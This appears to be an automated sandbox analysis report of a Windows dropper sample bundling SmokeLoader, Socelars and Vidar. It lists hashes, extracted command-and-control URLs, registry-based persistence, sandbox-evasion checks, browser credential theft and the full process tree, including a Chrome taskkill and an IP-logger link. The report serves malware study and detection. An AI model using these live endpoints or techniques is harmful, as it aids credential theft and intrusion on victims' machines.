smokeloader | 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df

Analysis

max time kernel
156s
max time network
173s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
22-02-2022 07:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
Size

3.6MB
MD5

dd50ef8e8e983f27154ab17911100b42
SHA1

cdb02b08be4c5f882e68bff48badf50d62ef8f66
SHA256

2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df
SHA512

ad061f2f4fcd1fec086b04ee6aff7d7861c6102b086952d74f6077ee9ea43b889faa52e82edc28047cf79f80eab9d272daa537e927fe3c6182a69cdfc63bcc34

Score

10^/10

smokeloader socelars vidar 890 backdoor evasion persistence spyware stealer trojan upx

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

vidar

Version

38.7

Botnet

890

https://HAL9THapi.faceit.comramilgame

Attributes

profile_id
890

Extracted

Family

smokeloader

Version

2020

http://khaleelahmed.com/upload/

http://twvickiassociation.com/upload/

http://www20833.com/upload/

http://cocinasintonterias.com/upload/

http://masaofukunaga.com/upload/

http://gnckids.com/upload/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\agdsk.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\agdsk.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 5104 created 4708 5104 WerFault.exe rundll32.exe
PID 2128 created 4752 2128 WerFault.exe File.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 5104 created 4708	5104	WerFault.exe	rundll32.exe
PID 2128 created 4752	2128	WerFault.exe	File.exe

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4752-168-0x00000000024D0000-0x0000000002567000-memory.dmp	family_vidar
behavioral2/memory/4752-169-0x0000000000400000-0x000000000049A000-memory.dmp	family_vidar

Executes dropped EXE 10 IoCs

Processes:

agdsk.exejg2_2qua.exeKRSetp.exewf-game.exeFiles.exepzyh.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exe

pid	process
1164	agdsk.exe
2072	jg2_2qua.exe
4192	KRSetp.exe
2752	wf-game.exe
2464	Files.exe
3680	pzyh.exe
3648	pub2.exe
4752	File.exe
3520	jfiag3g_gg.exe
4468	jfiag3g_gg.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exewf-game.exeFiles.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	wf-game.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Files.exe

Loads dropped DLL 2 IoCs

Processes:

rundll32.exepub2.exe

pid process

4708 rundll32.exe
3648 pub2.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4708	rundll32.exe
3648	pub2.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

pzyh.exemsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	pzyh.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

jg2_2qua.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg2_2qua.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

41 ip-api.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg2_2qua.exe

flow	ioc
41	ip-api.com

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\eb3deb83-e0d5-46a9-9c50-72a67882adb6.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129011108.pma	setup.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

5048 4708 WerFault.exe rundll32.exe
1852 4752 WerFault.exe File.exe

pid	pid_target	process	target process
5048	4708	WerFault.exe	rundll32.exe
1852	4752	WerFault.exe	File.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5348 taskkill.exe

pid	process
5348	taskkill.exe

Modifies registry class 4 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeWerFault.exejfiag3g_gg.exeWerFault.exemsedge.exemsedge.exe

pid	process
3648	pub2.exe
3648	pub2.exe
5048	WerFault.exe
5048	WerFault.exe
4468	jfiag3g_gg.exe
4468	jfiag3g_gg.exe
1852	WerFault.exe
1852	WerFault.exe
920	msedge.exe
920	msedge.exe
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
1864	msedge.exe
1864	msedge.exe
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

3648 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

1864 msedge.exe
1864 msedge.exe
1864 msedge.exe
1864 msedge.exe
1864 msedge.exe

pid	process
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

agdsk.exeKRSetp.exeWerFault.exesvchost.exetaskkill.exe

description	pid	process
Token: SeCreateTokenPrivilege	1164	agdsk.exe
Token: SeAssignPrimaryTokenPrivilege	1164	agdsk.exe
Token: SeLockMemoryPrivilege	1164	agdsk.exe
Token: SeIncreaseQuotaPrivilege	1164	agdsk.exe
Token: SeMachineAccountPrivilege	1164	agdsk.exe
Token: SeTcbPrivilege	1164	agdsk.exe
Token: SeSecurityPrivilege	1164	agdsk.exe
Token: SeTakeOwnershipPrivilege	1164	agdsk.exe
Token: SeLoadDriverPrivilege	1164	agdsk.exe
Token: SeSystemProfilePrivilege	1164	agdsk.exe
Token: SeSystemtimePrivilege	1164	agdsk.exe
Token: SeProfSingleProcessPrivilege	1164	agdsk.exe
Token: SeIncBasePriorityPrivilege	1164	agdsk.exe
Token: SeCreatePagefilePrivilege	1164	agdsk.exe
Token: SeCreatePermanentPrivilege	1164	agdsk.exe
Token: SeBackupPrivilege	1164	agdsk.exe
Token: SeRestorePrivilege	1164	agdsk.exe
Token: SeShutdownPrivilege	1164	agdsk.exe
Token: SeDebugPrivilege	1164	agdsk.exe
Token: SeAuditPrivilege	1164	agdsk.exe
Token: SeSystemEnvironmentPrivilege	1164	agdsk.exe
Token: SeChangeNotifyPrivilege	1164	agdsk.exe
Token: SeRemoteShutdownPrivilege	1164	agdsk.exe
Token: SeUndockPrivilege	1164	agdsk.exe
Token: SeSyncAgentPrivilege	1164	agdsk.exe
Token: SeEnableDelegationPrivilege	1164	agdsk.exe
Token: SeManageVolumePrivilege	1164	agdsk.exe
Token: SeImpersonatePrivilege	1164	agdsk.exe
Token: SeCreateGlobalPrivilege	1164	agdsk.exe
Token: 31	1164	agdsk.exe
Token: 32	1164	agdsk.exe
Token: 33	1164	agdsk.exe
Token: 34	1164	agdsk.exe
Token: 35	1164	agdsk.exe
Token: SeDebugPrivilege	4192	KRSetp.exe
Token: SeRestorePrivilege	5048	WerFault.exe
Token: SeBackupPrivilege	5048	WerFault.exe
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	4204	svchost.exe
Token: SeCreatePagefilePrivilege	4204	svchost.exe
Token: SeShutdownPrivilege	4204	svchost.exe
Token: SeCreatePagefilePrivilege	4204	svchost.exe
Token: SeShutdownPrivilege	4204	svchost.exe
Token: SeCreatePagefilePrivilege	4204	svchost.exe
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeDebugPrivilege	5348	taskkill.exe
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

msedge.exe

pid process

1864 msedge.exe
2920
1864 msedge.exe
2920
2920
2920
2920
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

wf-game.exe

pid process

2752 wf-game.exe
2752 wf-game.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2920

pid	process
1864	msedge.exe
2920
1864	msedge.exe
2920
2920
2920
2920

pid	process
2752	wf-game.exe
2752	wf-game.exe

pid	process
2920

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exemsedge.exewf-game.exeFiles.exepzyh.exeWerFault.exe

description	pid	process	target process
PID 3840 wrote to memory of 1164	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	agdsk.exe
PID 3840 wrote to memory of 1164	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	agdsk.exe
PID 3840 wrote to memory of 1164	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	agdsk.exe
PID 3840 wrote to memory of 2072	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	jg2_2qua.exe
PID 3840 wrote to memory of 2072	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	jg2_2qua.exe
PID 3840 wrote to memory of 2072	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	jg2_2qua.exe
PID 3840 wrote to memory of 4192	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	KRSetp.exe
PID 3840 wrote to memory of 4192	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	KRSetp.exe
PID 3840 wrote to memory of 1864	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	msedge.exe
PID 3840 wrote to memory of 1864	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	msedge.exe
PID 3840 wrote to memory of 2752	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	wf-game.exe
PID 3840 wrote to memory of 2752	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	wf-game.exe
PID 3840 wrote to memory of 2752	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	wf-game.exe
PID 1864 wrote to memory of 2264	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 2264	1864	msedge.exe	msedge.exe
PID 3840 wrote to memory of 2464	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	Files.exe
PID 3840 wrote to memory of 2464	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	Files.exe
PID 3840 wrote to memory of 2464	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	Files.exe
PID 3840 wrote to memory of 3680	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	pzyh.exe
PID 3840 wrote to memory of 3680	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	pzyh.exe
PID 3840 wrote to memory of 3680	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	pzyh.exe
PID 3840 wrote to memory of 3648	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	pub2.exe
PID 3840 wrote to memory of 3648	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	pub2.exe
PID 3840 wrote to memory of 3648	3840	2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe	pub2.exe
PID 2752 wrote to memory of 4708	2752	wf-game.exe	rundll32.exe
PID 2752 wrote to memory of 4708	2752	wf-game.exe	rundll32.exe
PID 2752 wrote to memory of 4708	2752	wf-game.exe	rundll32.exe
PID 2464 wrote to memory of 4752	2464	Files.exe	File.exe
PID 2464 wrote to memory of 4752	2464	Files.exe	File.exe
PID 2464 wrote to memory of 4752	2464	Files.exe	File.exe
PID 3680 wrote to memory of 3520	3680	pzyh.exe	jfiag3g_gg.exe
PID 3680 wrote to memory of 3520	3680	pzyh.exe	jfiag3g_gg.exe
PID 3680 wrote to memory of 3520	3680	pzyh.exe	jfiag3g_gg.exe
PID 5104 wrote to memory of 4708	5104	WerFault.exe	rundll32.exe
PID 5104 wrote to memory of 4708	5104	WerFault.exe	rundll32.exe
PID 3680 wrote to memory of 4468	3680	pzyh.exe	jfiag3g_gg.exe
PID 3680 wrote to memory of 4468	3680	pzyh.exe	jfiag3g_gg.exe
PID 3680 wrote to memory of 4468	3680	pzyh.exe	jfiag3g_gg.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe
PID 1864 wrote to memory of 540	1864	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
"C:\Users\Admin\AppData\Local\Temp\2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3840

C:\Users\Admin\AppData\Local\Temp\agdsk.exe
"C:\Users\Admin\AppData\Local\Temp\agdsk.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:5292

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5348

C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2072

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffea46446f8,0x7ffea4644708,0x7ffea4644718
3⤵
PID:2264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
3⤵
PID:540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3264 /prefetch:8
3⤵
PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
3⤵
PID:2752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
3⤵
PID:2024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:1
3⤵
PID:2668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5528 /prefetch:8
3⤵
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
3⤵
PID:5132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
3⤵
PID:5144

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 /prefetch:8
3⤵
PID:2144

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:2560

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x208,0x22c,0x7ff683555460,0x7ff683555470,0x7ff683555480
4⤵
PID:1076

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 /prefetch:8
3⤵
PID:3432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
